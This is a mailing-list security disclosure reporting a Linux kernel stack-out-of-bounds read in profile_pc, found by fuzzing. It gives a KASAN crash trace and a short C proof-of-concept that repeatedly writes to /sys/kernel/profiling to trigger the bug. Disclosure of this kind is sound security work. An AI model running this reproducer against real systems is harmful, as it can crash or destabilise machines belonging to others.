oss-sec mailing list archives
Linux kernel: stack-out-of-bounds in profile_pc
From: 黄 晓 <NigelXiao () outlook com>
Date: Thu, 18 Aug 2022 05:41:30 +0000
Hello: I found a bug through the syzkaller fuzz tool, you need to set CONFIG_KASAN=y, the crash information is displayed as out-of-bounds reading, I am weak and unable to analyze the harm of this bug. The bug program cannot be reproduced stably and needs to be run multiple times. Kernel version: 5.18.14 gcc version: 9.4.0 [ 49.449543] ================================================================== [ 49.463836] BUG: KASAN: stack-out-of-bounds in profile_pc+0x59/0x90 [ 49.466434] Read of size 8 at addr ffff88800a137cd0 by task sh/105 [ 49.466879] [ 49.467144] CPU: 2 PID: 105 Comm: sh Not tainted 5.17.9 #3 [ 49.467436] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014 [ 49.467774] Call Trace: [ 49.467954] <IRQ> [ 49.468121] dump_stack_lvl+0x34/0x44 [ 49.474368] print_address_description.constprop.0+0x21/0x150 [ 49.478895] ? profile_pc+0x59/0x90 [ 49.479192] ? profile_pc+0x59/0x90 [ 49.479479] kasan_report.cold+0x7f/0x11b [ 49.479684] ? profile_pc+0x59/0x90 [ 49.479874] ? _raw_spin_lock+0x92/0xd0 [ 49.480112] profile_pc+0x59/0x90 [ 49.480438] profile_tick+0x67/0x90 [ 49.480974] tick_sched_timer+0x7c/0xa0 [ 49.482393] __hrtimer_run_queues+0x1c6/0x420 [ 49.482901] ? tick_sched_handle.isra.0+0x80/0x80 [ 49.483139] ? enqueue_hrtimer+0xf0/0xf0 [ 49.483329] ? _raw_read_lock_bh+0x40/0x40 [ 49.483669] ? recalibrate_cpu_khz+0x10/0x10 [ 49.483959] ? recalibrate_cpu_khz+0x10/0x10 [ 49.484137] ? ktime_get_update_offsets_now+0x96/0x150 [ 49.484531] hrtimer_interrupt+0x1b6/0x350 [ 49.484777] __sysvec_apic_timer_interrupt+0xac/0x200 [ 49.485025] sysvec_apic_timer_interrupt+0x89/0xc0 [ 49.485554] </IRQ> [ 49.485759] <TASK> [ 49.485879] asm_sysvec_apic_timer_interrupt+0x12/0x20 [ 49.486309] RIP: 0010:_raw_spin_lock+0x92/0xd0 [ 49.486720] Code: 24 20 00 00 00 00 e8 0d 82 ee fe be 04 00 00 00 48 8d 7c 24 20 e8 fe 81 ee fe ba 01 00 00 00 8b 44 24 20 f0 0f b1 55 00 75 29 <48> b8 00 00 00 00 00 fc ff df 48 c7 04 03 00 00 00 004 [ 49.487645] RSP: 0000:ffff88800a137cd0 EFLAGS: 00000246 [ 49.488392] RAX: 0000000000000000 RBX: 1ffff11001426f9a RCX: ffffffff82445932 [ 49.488762] RDX: 0000000000000001 RSI: 0000000000000004 RDI: ffff88800a137cf0 [ 49.489162] RBP: ffffea000027f228 R08: 0000000000000001 R09: ffffed1001426f9f [ 49.489577] R10: 0000000000000003 R11: ffffed1001426f9e R12: 0000000009fc8067 [ 49.489926] R13: ffff888000000688 R14: 000fffffffe00000 R15: 0000000009fc8067 [ 49.490285] ? _raw_spin_lock+0x82/0xd0 [ 49.490602] ? _raw_spin_lock_irqsave+0xe0/0xe0 [ 49.490844] ? _raw_spin_unlock+0x16/0x30 [ 49.491148] ? do_wp_page+0x389/0x5f0 [ 49.491368] __handle_mm_fault+0x633/0x10d0 [ 49.491576] ? __pmd_alloc+0x240/0x240 [ 49.491764] ? down_read_trylock+0x102/0x160 [ 49.491978] handle_mm_fault+0x99/0x220 [ 49.492183] do_user_addr_fault+0x272/0x870 [ 49.492380] exc_page_fault+0x57/0xc0 [ 49.492577] ? asm_exc_page_fault+0x8/0x30 [ 49.492775] asm_exc_page_fault+0x1e/0x30 [ 49.492975] RIP: 0033:0x44c5ba [ 49.493374] Code: 00 48 8d 57 07 48 83 fa 0e 76 09 48 c1 ff 03 e8 29 d2 ff ff 49 83 c7 08 eb b1 c6 83 d1 00 00 00 00 e8 b4 c1 ff ff 41 83 fd 02 <c6> 05 38 4b 28 00 00 0f 84 a7 00 00 00 41 f6 44 24 1f5 [ 49.494114] RSP: 002b:00007fff75b9d630 EFLAGS: 00000293 [ 49.494334] RAX: 0000000001c5b010 RBX: 0000000001c5b010 RCX: 00007f6523d29760 [ 49.494599] RDX: 0000000000000000 RSI: 0000000001c5b370 RDI: 0000000000000000 [ 49.494922] RBP: 0000000001c5b370 R08: 00007f652424f740 R09: 0000000000000000 [ 49.495274] R10: 00007f652424fa10 R11: 0000000000000246 R12: 0000000001c5d950 [ 49.495550] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000001c5b2f0 [ 49.495851] </TASK> [ 49.496028] [ 49.496167] The buggy address belongs to the page: [ 49.496496] page:(____ptrval____) refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0xa137 [ 49.497096] flags: 0x100000000000000(node=0|zone=1) [ 49.497612] raw: 0100000000000000 ffffea0000284dc8 ffffea0000284dc8 0000000000000000 [ 49.497851] raw: 0000000000000000 0000000000000000 00000000ffffffff 0000000000000000 [ 49.498061] page dumped because: kasan: bad access detected [ 49.498263] [ 49.498325] addr ffff88800a137cd0 is located in stack of task sh/105 at offset 0 in frame: [ 49.498527] _raw_spin_lock+0x0/0xd0 [ 49.498920] [ 49.498992] this frame has 1 object: [ 49.501589] [32, 36) 'val' [ 49.501741] [ 49.502017] Memory state around the buggy address: [ 49.502406] ffff88800a137b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 49.502818] ffff88800a137c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 49.503125] >ffff88800a137c80: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 04 f3 [ 49.503502] ^ [ 49.504015] ffff88800a137d00: f3 f3 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 [ 49.504269] ffff88800a137d80: f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 49.504626] ================================================================== [ 49.504961] Disabling lock debugging due to kernel taint POC: ''' #define _GNU_SOURCE #include <endian.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> uint64_t r[1] = {0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, 0x1ffff000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul); syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul); syscall(__NR_mmap, 0x21000000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul); intptr_t res = 0; memcpy((void*)0x20000040, "/sys/kernel/profiling", 21); res = syscall(__NR_openat, 0xffffffffffffff9cul, 0x20000040ul, 0xe8502ul, 0ul); if (res != -1) r[0] = res; sprintf((char*)0x200000c0, "%023llo", (long long)r[0]); sprintf((char*)0x200000d7, "%020llu", (long long)-1); sprintf((char*)0x200000eb, "%023llo", (long long)-1); sprintf((char*)0x20000102, "%020llu", (long long)-1); sprintf((char*)0x20000116, "%023llo", (long long)-1); sprintf((char*)0x2000012d, "%023llo", (long long)r[0]); while(1)syscall(__NR_write, r[0], 0x200000c0ul, 0xbul); return 0; } ''' GK
Current thread:
- Linux kernel: stack-out-of-bounds in profile_pc 黄 晓 (Aug 18)
- Re: Linux kernel: stack-out-of-bounds in profile_pc Greg KH (Aug 18)